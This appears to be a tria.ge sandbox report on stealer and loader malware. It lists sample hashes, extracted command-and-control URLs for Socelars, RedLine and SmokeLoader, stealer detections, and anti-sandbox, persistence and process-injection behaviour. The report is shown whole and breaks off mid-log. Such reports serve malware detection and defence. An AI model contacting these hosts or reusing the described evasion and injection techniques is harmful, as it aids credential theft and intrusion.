Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
022e3c30a1...66.exe
windows7_x64
10022e3c30a1...66.exe
windows11_x64
10022e3c30a1...66.exe
windows10_x64
104d27dca0a1...ef.exe
windows7_x64
104d27dca0a1...ef.exe
windows11_x64
104d27dca0a1...ef.exe
windows10_x64
10578a3a7a2b...b3.exe
windows7_x64
10578a3a7a2b...b3.exe
windows11_x64
10578a3a7a2b...b3.exe
windows10_x64
109c4880a98c...82.exe
windows7_x64
109c4880a98c...82.exe
windows11_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows7_x64
10a1dad4a83d...c4.exe
windows11_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows7_x64
10acf1b7d80f...e0.exe
windows11_x64
10acf1b7d80f...e0.exe
windows10_x64
10cbf31d825a...d2.exe
windows7_x64
10cbf31d825a...d2.exe
windows11_x64
10cbf31d825a...d2.exe
windows10_x64
10db76a117db...12.exe
windows7_x64
10db76a117db...12.exe
windows11_x64
10db76a117db...12.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows7_x64
10e2ffb8aeeb...f6.exe
windows11_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10f2196668f4...cb.exe
windows7_x64
10f2196668f4...cb.exe
windows11_x64
10f2196668f4...cb.exe
windows10_x64
10Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
101s -
max time network
201s -
platform
windows11_x64 -
resource
win11 -
submitted
10/11/2021, 14:50
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win11
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
Behavioral task
behavioral4
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win7-en-20211104
Behavioral task
behavioral5
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win11
Behavioral task
behavioral6
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win7-en-20211014
Behavioral task
behavioral8
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win11
Behavioral task
behavioral9
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211104
Behavioral task
behavioral10
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win7-en-20211014
Behavioral task
behavioral11
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win11
Behavioral task
behavioral12
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211014
Behavioral task
behavioral13
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win7-en-20211104
Behavioral task
behavioral14
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win11
Behavioral task
behavioral15
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral16
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win7-en-20211104
Behavioral task
behavioral17
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win11
Behavioral task
behavioral18
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral19
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win7-en-20211014
Behavioral task
behavioral20
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win11
Behavioral task
behavioral21
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211014
Behavioral task
behavioral22
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win7-en-20211104
Behavioral task
behavioral23
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win11
Behavioral task
behavioral24
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-en-20211104
Behavioral task
behavioral25
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win7-en-20211014
Behavioral task
behavioral26
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win11
Behavioral task
behavioral27
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-en-20211104
Behavioral task
behavioral28
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win7-en-20211014
Behavioral task
behavioral29
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win11
Behavioral task
behavioral30
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-en-20211104
General
-
Target
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
-
Size
403KB
-
MD5
f957e397e71010885b67f2afe37d8161
-
SHA1
a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
-
SHA256
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
-
SHA512
8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6
Malware Config
Extracted
socelars
http://www.hhgenice.top/
Extracted
redline
tatreriash.xyz:80
Extracted
smokeloader
2020
http://nalirou70.top/
http://xacokuo80.top/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral2/memory/5324-307-0x0000000000360000-0x0000000000380000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x00040000000002c6-167.dat family_socelars behavioral2/files/0x00040000000002c6-168.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 6 IoCs
description pid Process procid_target PID 5352 created 5036 5352 WerFault.exe 102 PID 5676 created 2680 5676 WerFault.exe 89 PID 5584 created 4624 5584 WerFault.exe 88 PID 5948 created 768 5948 WerFault.exe 171 PID 6056 created 3184 6056 WerFault.exe 160 PID 2020 created 4492 2020 WerFault.exe 86 -
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/4196-367-0x0000000000690000-0x00000000006B1000-memory.dmp family_arkei -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/768-328-0x00000000022D0000-0x00000000023A5000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 28 IoCs
pid Process 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4752 97tPLM1BD83QAkW3t_oh9ywr.exe 4492 Up_EgQSePP1xxhPBvlLFqEqe.exe 4624 6Gjg3NTuW9hb7SqYymgdkeKo.exe 2680 tG94gZUleeBFo8SDyi6butFz.exe 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe 3944 o6NHz5BzimLqOLMlh9XEgPbX.exe 4400 ZvQmBbFSxCcYQP4fGiwTawkt.exe 768 cTOmx3wyJ995falPyP_CHHr6.exe 4640 KdlTj_CCMiXvvrf22JrhXXT5.exe 4936 yJqr3GGVaG4To30s0MDWLG61.exe 3736 wn6Tr5ouTTYnpiBNWaXIcaFu.exe 884 dsqTtt9nQpWwz1yYMBAEipS6.exe 2964 XATuOQAsPCyh5ifJCHUEKp4p.exe 3312 Gn5a2G1hE46fGK_8y4mb1keQ.exe 5036 kMCLvaZxUoL4ETDwWQqOc6MX.exe 4196 33CEtghZf4kJPxQoBSqEUgkF.exe 4532 cBHStp1tUjbmpWGPeFPixzx7.exe 4760 IDyIlZ0vcJMZmpFNQrobzffX.exe 2088 DJQTgMZwK7ZPTQPNMIvPAKa5.exe 4076 LPvnU5MCa7evfTEqGJQeEKaS.exe 2172 D9RJLCLd2f8688ZYCUxUkMQi.exe 3184 Cf1aoIESdkQ91XunX7mxtiH7.exe 1832 cutm3.exe 5364 iJ_zxQndnIcJiYyrXyCpQokM.exe 6048 Gn5a2G1hE46fGK_8y4mb1keQ.exe 6140 2905016.exe 5116 8syYjhN1kDn7VeWxv1eGSMvd.exe -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral2/files/0x000d0000000002b3-207.dat vmprotect behavioral2/files/0x000d0000000002b3-206.dat vmprotect behavioral2/memory/4760-289-0x0000000140000000-0x0000000140FFB000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cBHStp1tUjbmpWGPeFPixzx7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wn6Tr5ouTTYnpiBNWaXIcaFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wn6Tr5ouTTYnpiBNWaXIcaFu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dsqTtt9nQpWwz1yYMBAEipS6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dsqTtt9nQpWwz1yYMBAEipS6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Up_EgQSePP1xxhPBvlLFqEqe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kMCLvaZxUoL4ETDwWQqOc6MX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kMCLvaZxUoL4ETDwWQqOc6MX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cBHStp1tUjbmpWGPeFPixzx7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Up_EgQSePP1xxhPBvlLFqEqe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yJqr3GGVaG4To30s0MDWLG61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yJqr3GGVaG4To30s0MDWLG61.exe -
Loads dropped DLL 2 IoCs
pid Process 5364 iJ_zxQndnIcJiYyrXyCpQokM.exe 5364 iJ_zxQndnIcJiYyrXyCpQokM.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000500000000c300-186.dat themida behavioral2/files/0x000700000000c8df-189.dat themida behavioral2/files/0x0003000000009c70-188.dat themida behavioral2/files/0x000300000001e5e7-205.dat themida behavioral2/memory/4936-253-0x0000000000B30000-0x0000000000B31000-memory.dmp themida behavioral2/memory/3736-272-0x0000000000DB0000-0x0000000000DB1000-memory.dmp themida behavioral2/memory/4532-264-0x0000000000C20000-0x0000000000C21000-memory.dmp themida behavioral2/memory/884-341-0x0000000000900000-0x0000000000901000-memory.dmp themida behavioral2/files/0x000100000002b20c-412.dat themida behavioral2/files/0x000400000002b1fc-428.dat themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA yJqr3GGVaG4To30s0MDWLG61.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wn6Tr5ouTTYnpiBNWaXIcaFu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cBHStp1tUjbmpWGPeFPixzx7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Up_EgQSePP1xxhPBvlLFqEqe.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kMCLvaZxUoL4ETDwWQqOc6MX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dsqTtt9nQpWwz1yYMBAEipS6.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 107 ipinfo.io 107 ip-api.com 120 ipinfo.io 163 ipinfo.io 165 api.db-ip.com 167 api.db-ip.com 3 ipinfo.io 37 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 884 dsqTtt9nQpWwz1yYMBAEipS6.exe 4936 yJqr3GGVaG4To30s0MDWLG61.exe 3736 wn6Tr5ouTTYnpiBNWaXIcaFu.exe 4532 cBHStp1tUjbmpWGPeFPixzx7.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4492 set thread context of 5324 4492 Up_EgQSePP1xxhPBvlLFqEqe.exe 119 PID 3312 set thread context of 6048 3312 schtasks.exe 130 -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe XATuOQAsPCyh5ifJCHUEKp4p.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe XATuOQAsPCyh5ifJCHUEKp4p.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe DJQTgMZwK7ZPTQPNMIvPAKa5.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe DJQTgMZwK7ZPTQPNMIvPAKa5.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe DJQTgMZwK7ZPTQPNMIvPAKa5.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini DJQTgMZwK7ZPTQPNMIvPAKa5.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
pid pid_target Process procid_target 5968 2680 WerFault.exe 89 5832 5036 WerFault.exe 102 6084 4624 WerFault.exe 88 5440 768 WerFault.exe 93 3204 1476 WerFault.exe 90 6088 4752 WerFault.exe 87 6080 4076 WerFault.exe 104 5804 4640 WerFault.exe 92 4696 228 WerFault.exe 199 2156 2360 WerFault.exe 217 4172 4080 WerFault.exe 213 1560 5044 WerFault.exe 216 -
NSIS installer 4 IoCs
resource yara_rule behavioral2/files/0x000100000002b1c9-291.dat nsis_installer_1 behavioral2/files/0x000100000002b1c9-291.dat nsis_installer_2 behavioral2/files/0x000100000002b1c9-303.dat nsis_installer_1 behavioral2/files/0x000100000002b1c9-303.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Gn5a2G1hE46fGK_8y4mb1keQ.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Gn5a2G1hE46fGK_8y4mb1keQ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Gn5a2G1hE46fGK_8y4mb1keQ.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5608 schtasks.exe 3792 schtasks.exe 3312 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 104 taskkill.exe 3716 taskkill.exe 5772 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe 4728 jbA8_s3FlxHrMmUQPOwNJfp8.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeShutdownPrivilege 2412 svchost.exe Token: SeCreatePagefilePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 2412 svchost.exe Token: SeCreatePagefilePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 2412 svchost.exe Token: SeCreatePagefilePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 1408 svchost.exe Token: SeCreatePagefilePrivilege 1408 svchost.exe Token: SeCreateTokenPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeAssignPrimaryTokenPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeLockMemoryPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeIncreaseQuotaPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeMachineAccountPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeTcbPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSecurityPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeTakeOwnershipPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeLoadDriverPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSystemProfilePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSystemtimePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeProfSingleProcessPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeIncBasePriorityPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeCreatePagefilePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeCreatePermanentPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeBackupPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeRestorePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeShutdownPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeDebugPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeAuditPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSystemEnvironmentPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeChangeNotifyPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeRemoteShutdownPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeUndockPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeSyncAgentPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeEnableDelegationPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeManageVolumePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeImpersonatePrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeCreateGlobalPrivilege 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 31 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 32 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 33 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 34 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: 35 1476 XMGMTu3eQAvQPR86eRMXlDO9.exe Token: SeDebugPrivilege 3944 o6NHz5BzimLqOLMlh9XEgPbX.exe Token: SeRestorePrivilege 5832 WerFault.exe Token: SeBackupPrivilege 5832 WerFault.exe Token: SeBackupPrivilege 5832 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1408 wrote to memory of 5092 1408 svchost.exe 84 PID 1408 wrote to memory of 5092 1408 svchost.exe 84 PID 1436 wrote to memory of 4728 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 85 PID 1436 wrote to memory of 4728 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 85 PID 1436 wrote to memory of 4752 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 1436 wrote to memory of 4752 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 1436 wrote to memory of 4752 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 87 PID 1436 wrote to memory of 4492 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 1436 wrote to memory of 4492 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 1436 wrote to memory of 4492 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 86 PID 1436 wrote to memory of 4624 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 1436 wrote to memory of 4624 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 1436 wrote to memory of 4624 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 88 PID 1436 wrote to memory of 2680 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 1436 wrote to memory of 2680 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 1436 wrote to memory of 2680 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 89 PID 1436 wrote to memory of 1476 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 1436 wrote to memory of 1476 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 1436 wrote to memory of 1476 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 90 PID 1436 wrote to memory of 3944 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 94 PID 1436 wrote to memory of 3944 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 94 PID 1436 wrote to memory of 3944 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 94 PID 1436 wrote to memory of 4400 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 95 PID 1436 wrote to memory of 4400 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 95 PID 1436 wrote to memory of 4400 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 95 PID 1436 wrote to memory of 768 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 93 PID 1436 wrote to memory of 768 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 93 PID 1436 wrote to memory of 768 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 93 PID 1436 wrote to memory of 4640 1436 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 92 PID 1436 wrote to memory of 4640 1436 